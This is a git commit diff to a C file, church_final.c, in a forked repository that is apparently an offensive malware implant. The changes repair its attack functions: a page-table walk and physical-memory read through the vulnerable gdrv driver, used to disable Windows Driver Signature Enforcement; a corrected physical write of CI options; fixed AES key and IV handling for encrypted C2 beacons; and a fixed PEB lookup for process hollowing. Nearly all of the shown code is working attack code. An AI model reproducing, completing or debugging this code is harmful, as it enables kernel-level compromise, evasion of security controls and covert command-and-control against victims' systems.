forked from ek0mssavi0r/CHURCH
Update church_final.c
This commit is contained in:
parent
eddd01d11b
commit
d1be5497e0
|
|
@ -168,7 +168,8 @@ pNtWriteVirtualMemory NtWriteVirtualMemory = NULL;
|
||||||
|
|
||||||
// ==================== FORWARD DECLARATIONS ====================
|
// ==================== FORWARD DECLARATIONS ====================
|
||||||
ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen);
|
ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen);
|
||||||
ULONGLONG WalkPageTable(PVOID virtualAddr);
|
ULONGLONG WalkPageTable(HANDLE hDevice, PVOID virtualAddr);
|
||||||
|
ULONGLONG ReadPhysicalQword(HANDLE hDevice, ULONGLONG physAddr);
|
||||||
BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen);
|
BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen);
|
||||||
BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen);
|
BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen);
|
||||||
BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task);
|
BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task);
|
||||||
|
|
@ -212,7 +213,7 @@ VOID InitNtFunctions() {
|
||||||
|
|
||||||
// ==================== SINGLE INSTANCE ====================
|
// ==================== SINGLE INSTANCE ====================
|
||||||
BOOL EnsureSingleInstance() {
|
BOOL EnsureSingleInstance() {
|
||||||
HANDLE hMutex = CreateMutexW(NULL, TRUE, (LPCWSTR)g_mutex_name);
|
HANDLE hMutex = CreateMutexA(NULL, TRUE, g_mutex_name);
|
||||||
if (GetLastError() == ERROR_ALREADY_EXISTS) {
|
if (GetLastError() == ERROR_ALREADY_EXISTS) {
|
||||||
if (hMutex) CloseHandle(hMutex);
|
if (hMutex) CloseHandle(hMutex);
|
||||||
return FALSE;
|
return FALSE;
|
||||||
|
|
@ -348,13 +349,13 @@ BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* c
|
||||||
BCRYPT_KEY_HANDLE hKey = NULL;
|
BCRYPT_KEY_HANDLE hKey = NULL;
|
||||||
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
|
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
|
||||||
return FALSE;
|
return FALSE;
|
||||||
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
|
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, (ULONG)(wcslen(BCRYPT_CHAIN_MODE_CBC) * sizeof(WCHAR)), 0);
|
||||||
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0);
|
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, 32, 0);
|
||||||
DWORD paddedLen = ((plaintextLen + 15) / 16) * 16;
|
DWORD paddedLen = ((plaintextLen + 15) / 16) * 16;
|
||||||
*ciphertextLen = paddedLen + 16;
|
*ciphertextLen = paddedLen + 16;
|
||||||
*ciphertext = (BYTE*)malloc(*ciphertextLen);
|
*ciphertext = (BYTE*)malloc(*ciphertextLen);
|
||||||
if (!*ciphertext) { BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); return FALSE; }
|
if (!*ciphertext) { BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); return FALSE; }
|
||||||
NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *ciphertext, *ciphertextLen, ciphertextLen, BCRYPT_BLOCK_PADDING);
|
NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)g_aes_iv, 16, *ciphertext, *ciphertextLen, ciphertextLen, BCRYPT_BLOCK_PADDING);
|
||||||
BCryptDestroyKey(hKey);
|
BCryptDestroyKey(hKey);
|
||||||
BCryptCloseAlgorithmProvider(hAlg, 0);
|
BCryptCloseAlgorithmProvider(hAlg, 0);
|
||||||
return BCRYPT_SUCCESS(status);
|
return BCRYPT_SUCCESS(status);
|
||||||
|
|
@ -365,12 +366,12 @@ BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD*
|
||||||
BCRYPT_KEY_HANDLE hKey = NULL;
|
BCRYPT_KEY_HANDLE hKey = NULL;
|
||||||
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
|
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
|
||||||
return FALSE;
|
return FALSE;
|
||||||
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
|
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, (ULONG)(wcslen(BCRYPT_CHAIN_MODE_CBC) * sizeof(WCHAR)), 0);
|
||||||
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0);
|
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, 32, 0);
|
||||||
*plaintextLen = ciphertextLen;
|
*plaintextLen = ciphertextLen;
|
||||||
*plaintext = (BYTE*)malloc(*plaintextLen + 1);
|
*plaintext = (BYTE*)malloc(*plaintextLen + 1);
|
||||||
if (!*plaintext) return FALSE;
|
if (!*plaintext) return FALSE;
|
||||||
NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *plaintext, *plaintextLen, plaintextLen, BCRYPT_BLOCK_PADDING);
|
NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, (PUCHAR)g_aes_iv, 16, *plaintext, *plaintextLen, plaintextLen, BCRYPT_BLOCK_PADDING);
|
||||||
BCryptDestroyKey(hKey);
|
BCryptDestroyKey(hKey);
|
||||||
BCryptCloseAlgorithmProvider(hAlg, 0);
|
BCryptCloseAlgorithmProvider(hAlg, 0);
|
||||||
if (BCRYPT_SUCCESS(status)) (*plaintext)[*plaintextLen] = 0;
|
if (BCRYPT_SUCCESS(status)) (*plaintext)[*plaintextLen] = 0;
|
||||||
|
|
@ -865,10 +866,12 @@ BOOL DisableDSEviaGdrv() {
|
||||||
if (ciOptionsAddr) {
|
if (ciOptionsAddr) {
|
||||||
DWORD* relAddr = (DWORD*)(ciOptionsAddr + 2);
|
DWORD* relAddr = (DWORD*)(ciOptionsAddr + 2);
|
||||||
ULONGLONG targetAddr = ciOptionsAddr + 6 + *relAddr;
|
ULONGLONG targetAddr = ciOptionsAddr + 6 + *relAddr;
|
||||||
ULONGLONG physicalAddr = WalkPageTable((PVOID)targetAddr);
|
ULONGLONG physicalAddr = WalkPageTable(hDevice, (PVOID)targetAddr);
|
||||||
if (physicalAddr) {
|
if (physicalAddr) {
|
||||||
BYTE newValue = CI_OPTIONS_DISABLE_DSE;
|
BYTE writeBuf[16] = {0};
|
||||||
DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, &physicalAddr, sizeof(physicalAddr), &newValue, sizeof(newValue), &bytesReturned, NULL);
|
memcpy(writeBuf, &physicalAddr, sizeof(physicalAddr));
|
||||||
|
writeBuf[8] = CI_OPTIONS_DISABLE_DSE;
|
||||||
|
DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, &writeBuf, sizeof(writeBuf), NULL, 0, &bytesReturned, NULL);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -911,8 +914,39 @@ ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
ULONGLONG WalkPageTable(PVOID virtualAddr) {
|
ULONGLONG ReadPhysicalQword(HANDLE hDevice, ULONGLONG physAddr) {
|
||||||
return (ULONGLONG)virtualAddr;
|
ULONGLONG value = 0;
|
||||||
|
DWORD bytesRet = 0;
|
||||||
|
DeviceIoControl(hDevice, GDRV_IOCTL_READ_PHYSICAL, &physAddr, sizeof(physAddr), &value, sizeof(value), &bytesRet, NULL);
|
||||||
|
return value;
|
||||||
|
}
|
||||||
|
|
||||||
|
ULONGLONG WalkPageTable(HANDLE hDevice, PVOID virtualAddr) {
|
||||||
|
if (!hDevice || hDevice == INVALID_HANDLE_VALUE) return 0;
|
||||||
|
ULONGLONG va = (ULONGLONG)virtualAddr;
|
||||||
|
ULONGLONG pml4_idx = (va >> 39) & 0x1FF;
|
||||||
|
ULONGLONG pdpt_idx = (va >> 30) & 0x1FF;
|
||||||
|
ULONGLONG pd_idx = (va >> 21) & 0x1FF;
|
||||||
|
ULONGLONG pt_idx = (va >> 12) & 0x1FF;
|
||||||
|
ULONGLONG offset = va & 0xFFF;
|
||||||
|
for (ULONGLONG cr3 = 0x1000; cr3 < 0x200000; cr3 += 0x1000) {
|
||||||
|
ULONGLONG pml4e = ReadPhysicalQword(hDevice, cr3 + pml4_idx * 8);
|
||||||
|
if (!(pml4e & 1)) continue;
|
||||||
|
ULONGLONG pdpt_pa = pml4e & 0x7FFFFFFFFFFFF000ULL;
|
||||||
|
if (pml4e & 0x80) continue;
|
||||||
|
ULONGLONG pdpte = ReadPhysicalQword(hDevice, pdpt_pa + pdpt_idx * 8);
|
||||||
|
if (!(pdpte & 1)) continue;
|
||||||
|
if (pdpte & 0x80) return (pdpte & 0x7FFFFFFFFFFFC00000ULL) | (va & 0x3FFFFFFF);
|
||||||
|
ULONGLONG pd_pa = pdpte & 0x7FFFFFFFFFFFF000ULL;
|
||||||
|
ULONGLONG pde = ReadPhysicalQword(hDevice, pd_pa + pd_idx * 8);
|
||||||
|
if (!(pde & 1)) continue;
|
||||||
|
if (pde & 0x80) return (pde & 0x7FFFFFFFFFFFF00000ULL) | (va & 0x1FFFFF);
|
||||||
|
ULONGLONG pt_pa = pde & 0x7FFFFFFFFFFFF000ULL;
|
||||||
|
ULONGLONG pte = ReadPhysicalQword(hDevice, pt_pa + pt_idx * 8);
|
||||||
|
if (!(pte & 1)) continue;
|
||||||
|
return (pte & 0x7FFFFFFFFFFFF000ULL) | offset;
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
// ==================== PPL BYPASS ====================
|
// ==================== PPL BYPASS ====================
|
||||||
|
|
@ -1394,8 +1428,8 @@ BOOL ProcessHollowing(LPCWSTR targetProcess, LPCWSTR payloadPath) {
|
||||||
GetThreadContext(pi.hThread, &ctx);
|
GetThreadContext(pi.hThread, &ctx);
|
||||||
NtUnmapViewOfSection(pi.hProcess, (PVOID)ctx.Rdx);
|
NtUnmapViewOfSection(pi.hProcess, (PVOID)ctx.Rdx);
|
||||||
PVOID imageBase = NULL;
|
PVOID imageBase = NULL;
|
||||||
DWORD_PTR pebAddr = 0;
|
PROCESS_BASIC_INFORMATION pbi = {0};
|
||||||
NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pebAddr, sizeof(pebAddr), NULL);
|
NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
|
||||||
if (status == 0) {
|
if (status == 0) {
|
||||||
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)peData;
|
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)peData;
|
||||||
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(peData + pDos->e_lfanew);
|
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(peData + pDos->e_lfanew);
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user